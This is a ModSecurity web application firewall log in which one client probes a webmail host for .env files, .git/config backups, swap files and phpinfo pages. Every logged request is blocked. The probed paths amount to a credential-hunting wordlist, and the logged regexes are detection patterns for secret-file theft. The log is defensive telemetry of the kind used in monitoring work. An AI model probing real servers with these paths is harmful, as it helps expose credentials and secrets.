[Tue May 26 13:30:13.842338 2026] [security2:error] [pid 512745:tid 512922] [client 45.148.10.95:19350] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/.env.swp"] [unique_id "ahVTDXKSB_s2CvZg7xNssQAAATk"]
[Tue May 26 13:30:14.099663 2026] [security2:error] [pid 512745:tid 512897] [client 45.148.10.95:19390] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/.git/config.bak"] [unique_id "ahVTDnKSB_s2CvZg7xNsugAAASA"]
[Tue May 26 13:30:14.104241 2026] [security2:error] [pid 512344:tid 512570] [client 45.148.10.95:19274] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/.git/config.old"] [unique_id "ahVTDsbElyei4S77DQcF9wAAAGA"]
[Tue May 26 13:30:14.170639 2026] [security2:error] [pid 512344:tid 512480] [client 45.148.10.95:19414] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/.env~"] [unique_id "ahVTDsbElyei4S77DQcF-AAAAAY"]
[Tue May 26 13:30:14.257906 2026] [security2:error] [pid 512344:tid 512594] [client 45.148.10.95:19402] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/.git/config~"] [unique_id "ahVTDsbElyei4S77DQcF-QAAAHg"]
[Tue May 26 13:30:15.396018 2026] [security2:error] [pid 512344:tid 512510] [client 45.148.10.95:19336] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/.wp-config.php.swp"] [unique_id "ahVTD8bElyei4S77DQcGGwAAACQ"]
[Tue May 26 13:30:15.471972 2026] [security2:error] [pid 512344:tid 512557] [client 45.148.10.95:19402] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/ADMIN/.env"] [unique_id "ahVTD8bElyei4S77DQcGHwAAAFM"]
[Tue May 26 13:30:15.487562 2026] [security2:error] [pid 512745:tid 512959] [client 45.148.10.95:19318] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/API/.env"] [unique_id "ahVTD3KSB_s2CvZg7xNs9AAAAV4"]
[Tue May 26 13:30:15.617826 2026] [security2:error] [pid 512344:tid 512560] [client 45.148.10.95:19414] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/Api/.env"] [unique_id "ahVTD8bElyei4S77DQcGJAAAAFY"]
[Tue May 26 13:30:15.622535 2026] [security2:error] [pid 512745:tid 512933] [client 45.148.10.95:19300] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/APP/.env"] [unique_id "ahVTD3KSB_s2CvZg7xNs_AAAAUQ"]
[Tue May 26 13:30:15.623301 2026] [security2:error] [pid 512344:tid 512536] [client 45.148.10.95:19394] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/BACK/.env"] [unique_id "ahVTD8bElyei4S77DQcGJgAAAD4"]
[Tue May 26 13:30:15.623512 2026] [security2:error] [pid 512745:tid 513000] [client 45.148.10.95:19280] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/BACKEND/.env"] [unique_id "ahVTD3KSB_s2CvZg7xNs_QAAAYc"]
[Tue May 26 13:30:15.724708 2026] [security2:error] [pid 512745:tid 512905] [client 45.148.10.95:19350] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/BE/.env"] [unique_id "ahVTD3KSB_s2CvZg7xNs_gAAASg"]
[Tue May 26 13:30:15.766949 2026] [security2:error] [pid 512745:tid 512895] [client 45.148.10.95:19430] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/Be/.env"] [unique_id "ahVTD3KSB_s2CvZg7xNs_wAAAR4"]
[Tue May 26 13:30:15.775553 2026] [security2:error] [pid 512344:tid 512483] [client 45.148.10.95:19402] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/Backend/.env"] [unique_id "ahVTD8bElyei4S77DQcGKAAAAAk"]
[Tue May 26 13:30:16.273047 2026] [security2:error] [pid 512745:tid 512916] [client 45.148.10.95:19300] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/_profiler/phpinfo.php"] [unique_id "ahVTEHKSB_s2CvZg7xNtFgAAATM"]
[Tue May 26 13:30:16.412664 2026] [security2:error] [pid 512344:tid 512495] [client 45.148.10.95:19458] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/admin-app/.env"] [unique_id "ahVTEMbElyei4S77DQcGPgAAABU"]
[Tue May 26 13:30:16.489429 2026] [security2:error] [pid 512745:tid 512896] [client 45.148.10.95:19316] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/admin/phpinfo.php"] [unique_id "ahVTEHKSB_s2CvZg7xNtJgAAAR8"]
[Tue May 26 13:30:16.509195 2026] [security2:error] [pid 512745:tid 512961] [client 45.148.10.95:19430] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/admin_phpinfo.php"] [unique_id "ahVTEHKSB_s2CvZg7xNtJwAAAWA"]
[Tue May 26 13:30:16.518873 2026] [security2:error] [pid 512344:tid 512487] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTEMbElyei4S77DQcGMAAAAA0"]
[Tue May 26 13:30:16.541101 2026] [security2:error] [pid 512344:tid 512580] [client 45.148.10.95:19432] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/administrator/.env"] [unique_id "ahVTEMbElyei4S77DQcGRgAAAGo"]
[Tue May 26 13:30:16.565262 2026] [security2:error] [pid 512745:tid 512950] [client 45.148.10.95:19294] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/api-backend/.env"] [unique_id "ahVTEHKSB_s2CvZg7xNtKAAAAVU"]
[Tue May 26 13:30:16.576090 2026] [security2:error] [pid 512745:tid 512904] [client 45.148.10.95:19350] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/api-node/.env"] [unique_id "ahVTEHKSB_s2CvZg7xNtKQAAASc"]
[Tue May 26 13:30:16.590702 2026] [security2:error] [pid 512745:tid 512878] [client 45.148.10.95:19468] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/api/.env"] [unique_id "ahVTEHKSB_s2CvZg7xNtKwAAAQ0"]
[Tue May 26 13:30:16.688417 2026] [security2:error] [pid 512344:tid 512591] [client 45.148.10.95:19432] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/api/info.php"] [unique_id "ahVTEMbElyei4S77DQcGTgAAAHU"]
[Tue May 26 13:30:16.757877 2026] [security2:error] [pid 512344:tid 512535] [client 45.148.10.95:19402] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/api/phpinfo.php"] [unique_id "ahVTEMbElyei4S77DQcGUAAAAD0"]
[Tue May 26 13:30:16.873224 2026] [security2:error] [pid 512745:tid 512947] [client 45.148.10.95:19294] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/apis/.env"] [unique_id "ahVTEHKSB_s2CvZg7xNtPQAAAVI"]
[Tue May 26 13:30:16.939997 2026] [security2:error] [pid 512344:tid 512597] [client 45.148.10.95:19334] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/app/.env"] [unique_id "ahVTEMbElyei4S77DQcGWwAAAHs"]
[Tue May 26 13:30:17.131943 2026] [security2:error] [pid 512344:tid 512540] [client 45.148.10.95:19274] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/application/.env"] [unique_id "ahVTEcbElyei4S77DQcGYgAAAEI"]
[Tue May 26 13:30:17.143949 2026] [security2:error] [pid 512745:tid 512960] [client 45.148.10.95:19318] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/apps/.env"] [unique_id "ahVTEXKSB_s2CvZg7xNtUwAAAV8"]
[Tue May 26 13:30:17.443130 2026] [security2:error] [pid 512745:tid 512951] [client 45.148.10.95:19318] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/back-api/.env"] [unique_id "ahVTEXKSB_s2CvZg7xNtagAAAVY"]
[Tue May 26 13:30:17.454831 2026] [security2:error] [pid 512745:tid 512992] [client 45.148.10.95:19594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/back-end/.env"] [unique_id "ahVTEXKSB_s2CvZg7xNtawAAAX8"]
[Tue May 26 13:30:17.466592 2026] [security2:error] [pid 512745:tid 512991] [client 45.148.10.95:19448] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/back/.env"] [unique_id "ahVTEXKSB_s2CvZg7xNtbQAAAX4"]
[Tue May 26 13:30:17.471523 2026] [security2:error] [pid 512745:tid 512999] [client 45.148.10.95:19476] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/backend-api/.env"] [unique_id "ahVTEXKSB_s2CvZg7xNtbwAAAYY"]
[Tue May 26 13:30:17.483187 2026] [security2:error] [pid 512344:tid 512474] [client 45.148.10.95:19414] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/backend/.env"] [unique_id "ahVTEcbElyei4S77DQcGcwAAAAA"]
[Tue May 26 13:30:17.602724 2026] [security2:error] [pid 512344:tid 512577] [client 45.148.10.95:19274] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/be/.env"] [unique_id "ahVTEcbElyei4S77DQcGdwAAAGc"]
[Tue May 26 13:30:17.604785 2026] [security2:error] [pid 512745:tid 512944] [client 45.148.10.95:19594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/backup/.env"] [unique_id "ahVTEXKSB_s2CvZg7xNteAAAAU8"]
[Tue May 26 13:30:17.619354 2026] [security2:error] [pid 512745:tid 512913] [client 45.148.10.95:19448] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/beta/.env"] [unique_id "ahVTEXKSB_s2CvZg7xNteQAAATA"]
[Tue May 26 13:30:17.719400 2026] [security2:error] [pid 512745:tid 512953] [client 45.148.10.95:19546] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/client/.env"] [unique_id "ahVTEXKSB_s2CvZg7xNtgAAAAVg"]
[Tue May 26 13:30:17.754602 2026] [security2:error] [pid 512745:tid 512908] [client 45.148.10.95:19594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/cms/.env"] [unique_id "ahVTEXKSB_s2CvZg7xNthwAAASs"]
[Tue May 26 13:30:17.804683 2026] [security2:error] [pid 512344:tid 512536] [client 45.148.10.95:19414] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/config.php"] [unique_id "ahVTEcbElyei4S77DQcGfwAAAD4"]
